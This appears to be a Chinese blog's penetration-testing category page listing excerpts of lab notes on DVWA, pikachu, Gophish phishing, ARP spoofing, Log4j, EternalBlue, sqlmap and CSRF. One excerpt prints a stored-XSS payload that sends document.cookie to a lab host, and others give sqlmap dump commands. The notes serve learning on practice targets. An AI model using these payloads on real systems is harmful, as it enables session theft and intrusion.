渗透
文章平均质量分 56
玉米同学
新手请指教。
展开
-
phpstudy2018安装及打开目录浏览
1原创 2022-06-16 16:11:21 · 901 阅读 · 1 评论 -
DVWA配置教程
放到WWW下后,打开C:\WWW\DVWA-master\config将config.inc.php.dist重命名为config.inc.php并修改配置,mysql数据库密码标红:PHP function allow_url_include: EnabledDVWA给的提示:If you see disabled on either allow_url_fopen or allow_url_include, set the following in your php.ini fi原创 2022-05-30 18:54:23 · 2034 阅读 · 0 评论 -
Gophish:开源网络钓鱼工具包
目录简介Gophish 平台搭建简介Gophish是为企业和渗透测试人员设计的开源网络钓鱼工具包。它提供了快速,轻松地设置和执行网络钓鱼攻击以及安全意识培训的能力。gophish自带web面板,对于邮件编辑、网站克隆、数据可视化、批量发送等功能的使用带来的巨大的便捷。Gophish 平台搭建Gophish官网地址:https://getgophish.com/Gophish项目地址:https://github.com/gophish/gophishhttps://g原创 2022-05-25 01:19:00 · 1153 阅读 · 0 评论 -
ARP断网攻击
nmap网段arpspoof原创 2022-01-17 11:30:28 · 1918 阅读 · 0 评论 -
Log4j复现过程
log4j是一个记录日志的组件,用来对程序状态进行动态记录,logger.info("system propety: ${jndi:schema://url}");jndi:jndi解析器通过jdk获取内容,反序列化为java对象作为jndi,并打印,jndi就是这个从外部查找得到的java对象。schema:获取方式,jdk支持多种不同的查找方式,包括corbname, dns, iiop, iiopname, ldap, ldaps, rmi因ldap写法简单,被作为常用的获取方式原创 2021-12-26 23:02:01 · 2385 阅读 · 0 评论 -
蚁剑下载及安装教程
链接:https://pan.baidu.com/s/17qNy2Pp9S8xvx2Hr3TLo-A提取码:yumi解压后出现俩文件夹打开第二个文件夹,打开exe点击初始化,并选择此文件夹然后重启软件就可以了PS:戴上圣诞帽的小蚁,有被可爱到。...原创 2021-12-13 11:09:31 · 631 阅读 · 0 评论 -
重定向漏洞原理
一、漏洞介绍URL重定向(URLredirection)漏洞,又称跳转漏洞。指的是网络应用程序接受用户可控的输入作为到外部站点的链接,然后在重定向中使用该链接。可以认为是SSRF一种。二、漏洞原理http参数可能包含URL值,并且可能导致Web应用程序将请求重定向到指定的URL。通过将URL值修改为恶意站点,攻击者可以成功启动网络钓鱼诈骗并窃取用户凭据。由于修改后的链接中的服务器名称与原始站点相同,因此网络钓鱼尝试具有更可信赖的外观。常见的URL跳转代码如下Java: respons转载 2021-09-25 10:47:59 · 3659 阅读 · 0 评论 -
编辑文件时拒绝访问
属性——安全——user——编辑,完全控制原创 2021-09-23 16:37:29 · 125 阅读 · 0 评论 -
MYSQL5.0安装报错:1045-Access denied for user ‘root‘@‘localhost‘或者@“ip”
下载地址:MySQL :: Begin Your Download1.把phpstudy原来的mysql文件夹备份到本地,然后解压2.打开C:\Program Files (x86)\MySQL\MySQL Server 5.0,修改my.ini文件将inboot改为myisam,不然会语法编译错误。因为MyISAM相对简单所以在效率上要优于InnoDB。如果系统读多,写少。对原子性要求低。那么MyISAM最好的选择。且MyISAM恢复速度快。可直接用备份覆盖恢复。如果系统读少,写多原创 2021-09-23 16:36:07 · 364 阅读 · 0 评论 -
PHPCMS2008报错:最后一步完成的时候会提示MYSQL错误:MySQL Query Error
XSS和CSRF组合漏洞1.删除的地方存在漏洞,DNS注入将数据外带2.添加信息,在F12-网络中复制为fetch语句,在控制台粘贴,CSRF漏洞即出现。3.在xss.pt增加项目XSRF,写入fetch,复制生成的xss脚本4.寻找可以插入恶意脚本的地方,找到两个信息框存在XSS,粘贴生成的xss脚本。5.访问即中招,被添加新用户。...原创 2021-09-23 16:32:49 · 220 阅读 · 0 评论 -
PHPCMS2008报错:DNS解析,不支持解析和保存远程图片
打开C:\phpStudy\WWW\phpcms下的install.php注意看,它解析的网址为:www.phpcms.cn,然后我到浏览器访问了这个链接。因为这个网址太老旧,所以这个网址无法解析。最终解决办法就是:把里面 www.phpcms.cn 域名改成你正在安装 V9 的域名,或者改成 www.baidu.com,只要是能正常访问的页面即可。注意,不需要带协议,结尾不要带斜杠。...原创 2021-09-23 16:27:36 · 239 阅读 · 0 评论 -
PHPCMS安装报错:short_open_tag无法安装
下载地址:PhpCMS2008 |PhpCMS2008 sp4 build 20111122 GBK下载_网站源码_站长下载修改Mysql配置文件 ,在最后加入一行代码“ft_min_word_len=2”,否则全文检索功能将无法使用。修改php.ini其他选项菜单——打开配置文件——php.ini...原创 2021-09-23 16:24:24 · 112 阅读 · 0 评论 -
mysql的几张表
系统库:information_schemaschemata:存放库名Tables:存放表,table_name(表名),table_schema(表属于的库)Columns:存放所有字段column_name(字段名)table_name(字段属于的表名)table_schema(字段属于的库)...原创 2021-09-18 16:42:47 · 206 阅读 · 0 评论 -
常用端口协议
http:80https:443ftp:21ssh:22telent:23SMTP:25POP3:110mysql:3306Oracle:1521tomcat:8080SOCKS代理协议服务器常用端口号:1080远程桌面:3389radis(未授权):6379原创 2021-09-11 17:03:07 · 232 阅读 · 0 评论 -
burpsuite安装及配置(文末有安装包链接)
文章目录安装JDK配置变量测试环境配置是否成功burpsuite安装burpsuite设置1)设置浏览器抓包安装JDK将JDK解压放在一个路径下![在这里插入图片描述](https://img-blog.csdnimg.cn/20201226225225576.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MDMzOTgz原创 2020-12-27 00:16:49 · 1067 阅读 · 1 评论 -
解决虚拟机和主机网络通信问题
1)检查虚拟网卡有没有被禁用2)检查虚拟机与物理机是否在一个VMNet中3)检查虚拟机的IP地址与物理机对应的VMNet是否在一个网段4)检查虚拟机与物理机的防火墙是否允许PING,不行的话干脆全部关闭...原创 2021-06-17 10:33:01 · 3329 阅读 · 0 评论 -
kali 探测主机命令
arping:特定ip再网络中是否在线fping:探测特定ip是否在线hping 打开tcl交互式页面nbtscan探测目标主机netbios名字 服务进程nping 支持多协议p0f被动探测目标主机操作系统类型xprobe2探测操作系统...原创 2021-06-15 17:30:40 · 567 阅读 · 0 评论 -
kali攻击blue(win7)靶机
目录1.找到目标靶机2.进行漏洞探测,识别服务3.漏洞识别与发现1)探测永恒之蓝漏洞2)进行漏洞利用,获取权限3)在目标靶机写入一个文件配置blue IP地址(需要和kali处于同一网段,但最后一位不相同)KALI的主机IP地址为:192.168.179.128(用root)在KALI中ping通blue的地址,出现time即成功1.找到目标靶机nmap -p 445 192.168.179.0/24Nmap scan report for 192.168.179.1Host is up (原创 2020-12-28 20:42:20 · 4259 阅读 · 0 评论 -
Wannacry(永恒之蓝)病毒
一、Wannacry(永恒之蓝)病毒 2017.04-051)一种“蠕虫式”的勒索病毒软件,大小3.3MB,勒索病毒肆虐。2)由不法分子利用NSA(美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播。3)中国部分Windows操作系统用户遭受感染,校园网用户首当其冲,受害严重,大量实验室数据和毕业设计被锁定加密。部分大型企业的应用系统和数据库文件被加密后,无法正常工作,影响巨大。4)文件被加密,要求支付高比特币。5)比特币:比特币是一种P2P形式的虚拟的加密数字货币原创 2020-12-28 16:32:43 · 4839 阅读 · 1 评论 -
Metasploit工具
升级apt updateapt install metasploit-frameworkm's'f'console原创 2021-06-01 11:31:50 · 135 阅读 · 0 评论 -
vulnhub----GIGACHAD
DOWNLOAD:https://download.vulnhub.com/gigachad/gigachad_vh.ova原创 2021-06-01 18:20:51 · 350 阅读 · 0 评论 -
openRASP安装教程
RASP管理后台安装首先需要两个数据库,Elasticsearch和MongoDB,es用来存储报警和统计信息,mongo用来存储应用、账号密码等信息。目前对数据库的要求是MongoDB版本大于等于3.6ElasticSearch版本大于等于5.6,小于7.0我们使用docker安装这两个数据库,因为数据库一旦错误可以删除docker环境重新搭建。docker环境安装ElaticSearch安装因为版本要求在[5.6, 7.0)我们这里安装6.5.4版本。docker p原创 2021-06-03 15:58:08 · 1415 阅读 · 0 评论 -
pikachu~~~PHP反序列化
序列化serialize()序列化说通俗点就是把一个对象变成可以传输的字符串,比如下面是一个对象: class S{ public $test="pikachu"; } $s=new S(); //创建一个对象 serialize($s); //把这个对象进行序列化 序列化后得到的结果是这个样子的:O:1:"S":1:{s:4:"test";s:7:"pikachu";} O:代表object 1:代表对象名字长度原创 2021-06-06 18:13:51 · 122 阅读 · 1 评论 -
pikachu~~~RCE
RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 而,如果,设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“意想不到”的命令,从而...原创 2021-06-06 17:26:15 · 365 阅读 · 3 评论 -
XSS和CSRF总结
学完xss和csrf之后,感觉二者极其容易混淆,所以这里做一个总结和区分。网上看了一些解释发现五花八门,看的我云里雾里了,最后看了官方文档才xue'ming'b原创 2021-06-06 14:07:01 · 314 阅读 · 3 评论 -
pikachu~~~XSS
反射型xss(get)先输入'"<>$223探测特殊字符是否被过滤原创 2021-06-06 13:48:36 · 242 阅读 · 0 评论 -
存储型XSS清除方法
今天也是被自己气哭的一天今天做XSS盗取cookie实验<script>document.location='http://192.168.241.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>就是用这个罪恶的p原创 2021-06-06 12:20:33 · 2051 阅读 · 4 评论 -
信息搜集篇
壹fofa既可以搜索到部分子域名,也可以搜索到目标的各种系统,如OA、后台等等,而这些系统很容易成为突破口。今天学习了用fofa搜集信息的一些方法以及技巧:title="目标名称" && region="xx省"title="目标名称" && city="xx市"cert="目标域名或者证书关键字" && region="xx省"cert="目标域名或者证书关键字" && city="xx市"((title="目标名称" || h原创 2021-06-06 09:11:51 · 90 阅读 · 0 评论 -
pikachu~~~CSRF(get,post,token)
GET /pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=dv&phonenum=num&add=beijing&email=kobe%40pikachu.com&submit=submit HTTP/1.1原创 2021-06-06 00:28:48 · 1619 阅读 · 8 评论 -
Sqlmap使用-盲注小实验
sqlmap简介sqlmap支持五种不同的注入模式:1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用union的情况下的注入。 5、堆查询注入,可以同时执行多条语句的执行时的注入。...原创 2021-06-03 23:56:11 · 6144 阅读 · 2 评论 -
pikachu~~~布尔,时间,宽字节盲注
基于boolian的盲注屏蔽了报错信息,只显示两种情况:正确和错误输入单引号试探f原创 2021-06-03 22:06:16 · 1279 阅读 · 2 评论 -
pikachu~~~验证码绕过(on client & on server)
index基于服务端的验证码绕过(On service)基于客户端的验证码绕过(On client)【客户端可能存在的安全问题】【服务端可能存在的安全问题】我们要来思考一下,什么是验证码绕过?首先,我们在哪里会经常使用到验证码?对咯,在各web网页以及APP的登陆界面,会让我们输入:用户名,密码,验证码这三项。那绕过?怎么绕过呢?那比如说,你在软件园,去B8上课,走着走着,哎?这个平时走的路被围上了,在修路,这儿走不了了,你一定要直着走过去吗?那修路的大爷估计就要抽你了。那你咋办?你一看旁边原创 2020-12-28 14:42:47 · 1961 阅读 · 1 评论 -
pikachu~~~搜索型,xx型注入
先输入字符'试探一下原创 2021-05-31 11:25:51 · 290 阅读 · 0 评论 -
pikachu~~~insert/update/delete,http头注入
@[TOC]select TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.tables where TABLE_SCHEMA='pikachu'select TABLE_NAME, COLUMN_NAME from INFORMATION_SCHEMA.columns where TABLE_NAME='users'select username,password from users#UPDATEXML (XML_document, XPa.原创 2021-05-30 23:56:37 · 774 阅读 · 1 评论 -
DVWA------暴力破解(全级别详解)
DVWA安装教程:https://www.cnblogs.com/lsdb/p/6826519.htmlBrute Force(暴力破解)两个字:撞库三个字:枚举法暴力破解的意思是攻击者借助计算机的高速计算不停枚举所有可能的用户名和密码,直到尝试出正确的组合,成功登录系统。理论上,只要字典足够大,破解总是会成功的。阻止暴力破解的最有效方式是设置复杂的密码(英文字母大小写、数字、符号混合)。而如果你的字典是从某网站泄露出来的,你使用它试图登陆其他网站,就便是撞库。撞库攻击的成功率高于暴力破解,原创 2021-05-26 19:02:11 · 18355 阅读 · 6 评论 -
Python V-ing 变化小程序
先区分规则1.一般情况下,在动词词尾直接加-ing,2、以一个字母-e结尾的单词,去掉字母-e,再加-ing3、以重读闭音节结尾,即“辅+元+辅”结尾的动词,先双写末尾的辅音字母,再加-ing。4、以-ie结尾的动词,把-ie改为-y,再加-ing。分别对应定义四个方法利用数组定义和截取相应部分,并进行拼接:利用if对截取部分进行判断再分别调用方法进行动词的转换:运行结果:...原创 2021-05-24 11:20:55 · 220 阅读 · 0 评论 -
DVWA-----sql盲注
抓包sqlmap跑数据sqlmap -r 1.txt -dbssqlmap -r 1.txt -D dvwa -dump-allsqlmap -r 1.txt -D dvwa -tablessqlmap -r 1.txt -D dvwa -T users -dump原创 2021-05-20 21:28:25 · 117 阅读 · 0 评论 -
kali工具安装
汉化火狐浏览器:先执行命令:apt -y install firefox-esr-l10n-zh-cn(中途选择y)再打开火狐浏览器:安装google拼音输入法使用命令 apt-get install fcitx 安装输入法框架使用命令 apt-get install fcitx-googlepinyin 安装谷歌输入法安装beefapt-get install beef-xss配置密码/etc/beef-xss/config.yaml 默认用户名beef修改用户名或者密码,注意原创 2021-05-19 17:50:12 · 856 阅读 · 0 评论 -
gobuster,medusa,nmap,zmap
ATT&CK:针对网络攻击行为的知识库,囊括攻击生命周期以及每个攻击阶段的目标。https://www.ddosi.com/att/备案号查询:www.beianbeian.com是否存在CDN:nslookup+域名Ping 网站有:http://ping.chinaz.com/http://ping.aizhan.com/http://ce.cloud.360.cn/查看 IP 与 域名绑定的历史记录,可能会存在使用 CDN 前的记录,相关查询网站有:https://dnsd原创 2021-05-16 16:27:35 · 382 阅读 · 0 评论